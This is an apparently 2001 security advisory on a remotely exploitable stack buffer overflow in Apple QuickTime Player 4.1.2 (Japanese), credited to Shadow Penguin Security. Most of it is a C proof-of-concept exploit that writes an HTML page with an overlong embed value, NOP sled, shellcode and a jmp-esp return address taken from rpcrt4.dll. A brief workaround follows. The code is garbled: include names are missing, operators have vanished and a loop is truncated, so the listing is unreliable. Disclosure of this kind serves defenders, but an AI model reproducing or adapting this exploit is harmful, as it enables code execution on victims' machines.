Reported January 31, 2001, by Shadow Penguin Security.

VERSIONS AFFECTED
  • Apple Quicktime Player 4.1.2 (Japanese)

DESCRIPTION

A remotely exploitable buffer overflow has been discovered in Apple's Quicktime Player 4.1.2 Japanese versions.  An attacker can alter the program's flow of execution by copying excessive amounts of data to the stack.

DEMONSTRATION

The following code was provided by UNYUN; (In order for the code to function remove the ; in front of each line.)

---------------------------------------------------------------------

;/*===============================================================


;Apple QuickTime 4.1.2 plug-in exploit
;The Shadow Penguin Security (http://shadowpenguin.backsection.net)
;Written by UNYUN (shadowpenguin@backsection.net)
;

=============================================================


;*/
;
; #include
; #include
; #include
;
;#define MOV_FILE "c:\\program files\\quicktime\\sample.mov"
;#define HEIGHT 60
;#define WIDTH 60
;#define TARGET "QUICKTIMEPLAYER"
;#define FILE_IMAGE \
;" ;"width=%d height=%d autoplay=\"true\" "\
;"target=\"%s\">
"
;#define BUFSIZE 730
;#define RET 684
;#define ESP_TGT "rpcrt4.dll"
;#define JMPESP_1 0xff
;#define JMPESP_2 0xe4
;#define NOP 0x90
;
;unsigned char exploit_code\[200\]=\{
;0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
;0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
;0xFF,0xD0,0x00,
;\};
;
;main(int argc,char *argv\[\])
;\{
;FILE *fp;
;char buf\[BUFSIZE\];
;unsigned int i,pretadr,p,ip,kp;
;MEMORY_BASIC_INFORMATION meminfo;
;
;if (argc<2)\{
;printf("usage : %s Output_HTML-fileName \[Sample .mov file\]\n",
;argv\[0\]);
;exit(1);
;\}
;
;if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))

NULL)\{
;printf("%s is not found.\n",ESP_TGT);
;exit(1);
;\}
;
;VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
;pretadr=0;
;for (i=0;i ;p=kp+i;
;if ( ( p &0xff)

0
;|| ((p>>8 )&0xff)

0
;|| ((p>>16)&0xff)

0
;|| ((p>>24)&0xff)

0) continue;
;if ( *((unsigned char *)p)

JMPESP_1
;&& *(((unsigned char *)p)+1)

JMPESP_2)
;pretadr=p;
;\}
;if ((fp=fopen(argv\[1\],"wb"))

NULL)\{
;printf("File write error \"%s\"\n",argv\[1\]);
;exit(1);
;\}
;memset(buf,NOP,BUFSIZE);
;memcpy(buf+700-12,exploit_code,strlen(exploit_code));
;buf\[BUFSIZE-2\]=0;
;
;ip=pretadr;
;printf("EIP=%x\n",ip);
;buf\[RET \]=ip&0xff;
;buf\[RET+1\]=(ip>>8)&0xff;
;buf\[RET+2\]=(ip>>16)&0xff;
;buf\[RET+3\]=(ip>>24)&0xff;
;
;if (argc

2)
;fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET);
;else
;fprintf(fp,FILE_IMAGE,argv\[2\],buf,WIDTH,HEIGHT,TARGET);
;fclose(fp);
;printf("Done.\n");
;\}
;
;-----
;UNYUN
;% The Shadow Penguin Security \[ http://shadowpenguin.backsection.net \]
;shadowpenguin@backsection.net (SPS-Official)
;unyun@shadowpenguin.org (Personal)
;% eEye Digital Security Team \[ http://www.eEye.com \]
;unyun@eEye.com

;

VENDOR RESPONSE

It is unknown whether Shadow Penguin Security contacted the vendor. For a current workaround, a user can disable ActiveX or the QuickTime plugin.

CREDIT
Discovered by
Shadow Penguin Security.